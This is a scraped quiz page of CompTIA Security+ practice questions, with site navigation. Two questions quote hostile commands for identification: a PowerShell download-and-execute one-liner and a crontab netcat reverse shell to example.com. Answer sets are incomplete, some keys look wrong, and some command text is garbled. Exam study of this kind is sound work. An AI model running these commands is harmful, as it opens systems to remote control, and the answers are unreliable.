Frank is a security administrator for a large company. Occasionally, a user needs to access a specific resource that they don't have permission to access. Which access control methodology would be most helpful in this situation?

Discretionary access control (DAC)

What function does counter mode perform in a cryptographic system?

It turns a block cipher into a stream cipher.

It reverses the encryption process.

It turns a stream cipher into a block cipher.

It allows public keys to unlock private keys.

Claire discovers the following PowerShell script. What does it do? powershell.exe -ep Bypass -nop -noexit -c iex ((New ObjectNet.WebClient). DownloadString('https://example.com/file.psl))

Downloads a file and opens a remote shell

Uploads a file and deletes the local copy

Kara has been asked to include IP schema management as part of her configuration management efforts. Which of the following is a security advantage of IP schema configuration management?

Using IP addresses to secure encryption keys

Preventing denial-of-service attacks

Cassandra is concerned about attacks against her network's Spanning Tree Protocol (STP). She wants to ensure that a new switch introduced by an attacker cannot change the topology by asserting a lower bridge ID than the current configuration. What should she implement to prevent this?

Set the bridge ID to a negative number

Alice wants to prevent SSRF attacks. Which of the following will not be helpful for preventing them?

Removing all SQL code from submitted HTTP queries

Blocking hostnames like 127.0.01 and localhost

Blocking sensitive URLs like /admin

Applying whitelist-based input filters

Charles finds a PFX formatted file on the system he is reviewing. What is a PFX file capable of containing?

A server certificate, intermediate certificates, and the private key

Only certificates and chain certificates, not private keys

None of the above, because PFX files are used for certificate requests only

Jason wants to implement a remote access virtual private network (VPN) for users in his organization who primarily rely on hosted web applications. What common VPN type is best suited to this if he wants to avoid deploying client software to his end-user systems?

An RDP (Remote Desktop Protocol) VPN

An Internet Control Message Protocol (ICMP) VPN

What key advantage does an elliptical curve cryptosystem have over an RSA-based cryptosystem?

It can use a smaller key length for the same resistance to being broken.

It requires only a single key to encrypt and decrypt.

It can run on older processors.

It can be used for digital signatures as well as encryption.

Amanda encounters a Bash script that runs the following command: crontab -e ****nc example.com 8989 -e /bin/bash What does this command do?

It pulls data from example.com every minute.

Abigail is responsible for setting up a network-based intrusion prevention system (NIPS) on her network. The NIPS is located in one particular network segment. She is looking for a passive method to get a copy of all traffic to the NIPS network segment so that it can analyze the traffic. Which of the following would be her best choice?

Setting the NIPS on a VLAN that is connected to all other segments

Setting up a NIPS on each segment

Gary wants to check for the mail servers for example.com . What tool and command can he use to determine this?

nslookup -query =mx example.com

Bob needs to block Secure Shell (SSH) traffic between two security zones. Which of the following Linux iptables firewall rules will block that traffic from the 10.0.10.0/24 network to the system the rule is running on?

iptables -A INPUT -p tcp --dport 22 -i eth0 -s 10.0.10.0/24 -j DROP

iptables -D OUTPUT -p udp -dport 21 -i eth0 -s 10.0.10.255 -j DROP

iptables -A OUTPUT -p udp --dport 22 -i eth0 -s 10.0.10.255 -j BLOCK

iptables -D INPUT -p udp --dport 21 -I eth0 -s 10.0.10.0/24 -j DROP

A security administrator is reviewing the company's continuity plan, and it specifies an RTO of four hours and an RPO of one day. Which of the following is the plan describing?

Systems should be restored within four hours with a loss of one day's worth of data at most.

Systems should be restored within one day and should remain operational for at least four hours.

Systems should be restored within four hours and no later than one day after the incident.

Systems should be restored within one day and lose, at most, four hours' worth of data.

What type of information does a control risk apply to?

Personally identifiable information (PII)

CompTIA Sec+ Ultimate Tricky Questions Compendium Part 1

Authored by blackpanther300 blackpanther300

Computers

12th Grade

Used 3+ times

CompTIA Sec+ Ultimate Tricky Questions Compendium Part 1

AI Actions

Add similar questions

Adjust reading levels

Convert to real-world scenario

Translate activity

More...

Content View

Student View

55 questions

Show all answers

MULTIPLE CHOICE QUESTION

1 min • 1 pt

Tracy wants to limit when users can log in to a standalone Windows workstation. What can Tracy do to make sure that an account called "visitor" can only log in between 8 a.m. and 5 p.m. every weekday?

Running the command net user visitor

/time:M-F,8am-5pm

Running the command netreg user visitor

-daily -working-hours

Running the command login limit:daily time: 8-5

This cannot be done from the Windows command line

MULTIPLE CHOICE QUESTION

1 min • 1 pt

Emily wants to capture HTTPS packets using tcpdump. If the service is running on its default port and her Ethernet adapter is eth0, which tcpdump command should she use?

tcpdump eth0 -proto https

tcpdump -i eth0 -proto https

tcpdump tcp https eth0

tcpdump -i eth0 tcp port 443

MULTIPLE CHOICE QUESTION

1 min • 1 pt

The following graphic shows a report from an OpenVAS vulnerability scan. What should Charles do first to determine the best fix for the vulnerability shown?

Disable PHP-CGI.

Upgrade PHP to version 5.4.

Review the vulnerability descriptions in the CVEs listed.

Disable the web server.

MULTIPLE CHOICE QUESTION

1 min • 1 pt

Which of the following is the best description of a stored procedure?

Code that is in a DLL, rather than the executable

Server-side code that is called from a client

SQL statements compiled on the database server as a single procedure that can be called

Procedures that are kept on a separate server from the calling application, such as in middleware

MULTIPLE CHOICE QUESTION

1 min • 1 pt

What additional security control can Amanda implement if she uses compiled software that she cannot use if she only has software binaries?

She can review the source code.

She can test the application in a live environment.

She can check the checksums provided by the vendor.

None of the above

MULTIPLE CHOICE QUESTION

1 min • 1 pt

Irene wants to use a cloud service for her organization that does not require her to do any coding or system administration, and she wants to do minimal configuration to perform the tasks that her organization needs to accomplish. What type of cloud service is she most likely looking for?

SaaS

PaaS

IaaS

IDaaS

MULTIPLE CHOICE QUESTION

1 min • 1 pt

What is the most common format for certificates issued by certificate authorities?

DER

PFX

PEM

P7B

Access all questions and much more by creating a free account

Create resources

Host any resource

Get auto-graded reports

Continue with Google

Continue with Email

Continue with Classlink

Continue with Clever

or continue with

Microsoft

Apple

Others

Already have an account?

Similar Resources on Wayground

50 questions

Bộ ôn 2 - Tháng 7.2023

Quiz

•

12th Grade

50 questions

TIN HỌC 10 HK2

Quiz

•

10th - 12th Grade

50 questions

Excel Review

Quiz

•

9th - 12th Grade

50 questions

Empowerment Technology

Quiz

•

12th Grade

50 questions

CAT - Gr 10 - Hardware & Software

Quiz

•

KG - University

55 questions

HTML Basics

Quiz

•

11th - 12th Grade

58 questions

Building Materials

Quiz

•

10th - 12th Grade

56 questions

CompTia 1001 Exam Review

Quiz

•

10th Grade - University

Popular Resources on Wayground

15 questions

Fractions on a Number Line

Quiz

•

3rd Grade

14 questions

Boundaries & Healthy Relationships

Lesson

•

6th - 8th Grade

13 questions

SMS Cafeteria Expectations Quiz

Quiz

•

6th - 8th Grade

20 questions

Equivalent Fractions

Quiz

•

3rd Grade

25 questions

Multiplication Facts

Quiz

•

5th Grade

12 questions

SMS Restroom Expectations Quiz

Quiz

•

6th - 8th Grade

20 questions

Main Idea and Details

Quiz

•

5th Grade

10 questions

Pi Day Trivia!

Quiz

•

6th - 9th Grade

Discover more resources for Computers

15 questions

Pi Day Trivia

Quiz

•

9th - 12th Grade

10 questions

Understanding Pi and Its Applications

Interactive video

•

7th - 12th Grade

22 questions

El Imperfecto

Quiz

•

9th - 12th Grade

20 questions

Grammar

Quiz

•

9th - 12th Grade

7 questions

History of St. Patrick's Day for Kids | Bedtime History

Interactive video

•

1st - 12th Grade

22 questions

Regular Preterite -AR-ER-IR-

Quiz

•

12th Grade

27 questions

quiz review Senderos 2 En el consultorio

Quiz

•

9th - 12th Grade

25 questions

PI Day Trivia Contest

Quiz

•

9th - 12th Grade

CompTIA Sec+ Ultimate Tricky Questions Compendium Part 1

Tracy wants to limit when users can log in to a standalone Windows workstation. What can Tracy do to make sure that an account called "visitor" can only log in between 8 a.m. and 5 p.m. every weekday?

Emily wants to capture HTTPS packets using tcpdump. If the service is running on its default port and her Ethernet adapter is eth0, which tcpdump command should she use?

The following graphic shows a report from an OpenVAS vulnerability scan. What should Charles do first to determine the best fix for the vulnerability shown?

Which of the following is the best description of a stored procedure?

What additional security control can Amanda implement if she uses compiled software that she cannot use if she only has software binaries?

Irene wants to use a cloud service for her organization that does not require her to do any coding or system administration, and she wants to do minimal configuration to perform the tasks that her organization needs to accomplish. What type of cloud service is she most likely looking for?

What is the most common format for certificates issued by certificate authorities?

You are a security administrator for Acme Corporation. You have discovered malware on some of your company's machines. This malware seems to intercept calls from the web browser to libraries, and then manipulates the browser calls. What type of attack is this?

Frank is a security administrator for a large company. Occasionally, a user needs to access a specific resource that they don't have permission to access. Which access control methodology would be most helpful in this situation?

What function does counter mode perform in a cryptographic system?

Access all questions and much more by creating a free account

Similar Resources on Wayground

Popular Resources on Wayground

Discover more resources for Computers